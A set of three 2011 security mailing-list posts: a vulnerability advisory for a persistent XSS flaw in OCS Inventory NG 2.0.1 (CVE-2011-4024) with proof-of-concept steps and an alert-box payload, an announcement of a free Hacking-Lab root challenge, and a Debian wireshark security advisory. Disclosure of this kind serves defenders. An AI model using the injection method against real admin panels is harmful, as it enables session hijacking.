OCS Inventory NG 2.0.1 Persistent XSS (CVE-2011-4024) --- Software : Open Computer and Software (OCS) Inventory NG Download : http://www.ocsinventory-ng.org/ Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com) Discover : 2011-10-04 Published : 2011-10-05 Version : 2.0.1 and prior Impact : Persistent XSS Remote : Yes (No authentication is needed) CVE-ID : CVE-2011-4024 Info Open Computer and Software (OCS) Inventory Next Generation (NG) is an application designed to help a network or system administrator keep track of the computers configuration and software that are installed on the network. Details --- The vulnerability is in the data sent by the agent OCS. The inventory service and the admin panel does not control the data received. An attacker could inject malicous HTML/JS through into the inventory information (eg. the computer description field under WinXP). This data is printed in the admin panel wich can lead to a session hijack or whatever you want. PoC --- 1. Enter the XSS script (eg. scriptalert(String.fromCharCode(88,83,83))/script) in the computer description field. (WinXP System Properties Computer Name Computer Description) 2. Launch an inventory with OCS Agent 3. Go on the admin panel (http://SERVER/ocsreports/) 4. View your computer detail Tested on : OCS Agent 2.0.1 (WinXP SP3) and OCS Server 2.0.1 (Windows). Not tested on : Linux Plateform and GLPI (OCS import) Solution Upgrade to OCS Inventory NG 2.0.2
GotRoot Security Challenge
Hi all, We are proud to present a new free hacking challenge! It's all about getting root on a linux host! This time, we will provide a target host you will access with ssh and to disclose the /root/secret.txt file. Increase your knowledge about restricted environments and bypassing them; enjoy this free event! Interested? Please sign-up a Hacking-Lab account and register yourself (free) to the Hacking Challenge classroom. * https://www.hacking-lab.com/events/ Direct registration URL * https://www.hacking-lab.com/events/registerform.html?eventid=199 Other Challenges * There are other challenges available in the same classroom * Web Security challenges and more .. Regards Ivan Buetler / E1 Compass Security, Switzerland
[SECURITY] [DSA 2324-1] wireshark security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2324-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff October 20, 2011 http://www.debian.org/security/faq - - Package: wireshark Vulnerability : programming error Problem type : remote Debian-specific: no CVE ID : CVE-2011-3360 The Microsoft Vulnerability Research group discovered that insecure load path handling could lead to execution of arbitrary Lua script code. For the oldstable distribution (lenny), this problem has been fixed in version 1.0.2-3+lenny15. This build will be released shortly. For the stable distribution (squeeze), this problem has been fixed in version 1.2.11-6+squeeze4. For the unstable distribution (sid), this problem has been fixed in version 1.6.2-1. We recommend that you upgrade your wireshark packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6gejgACgkQXm3vHE4uylpyVQCg42CjnLYSmkZAXRA893RRPvVd VnoAoKQyv6Bp7DcLxOuQ4HWeezkIhJ2/ =Ukxm -END PGP SIGNATURE-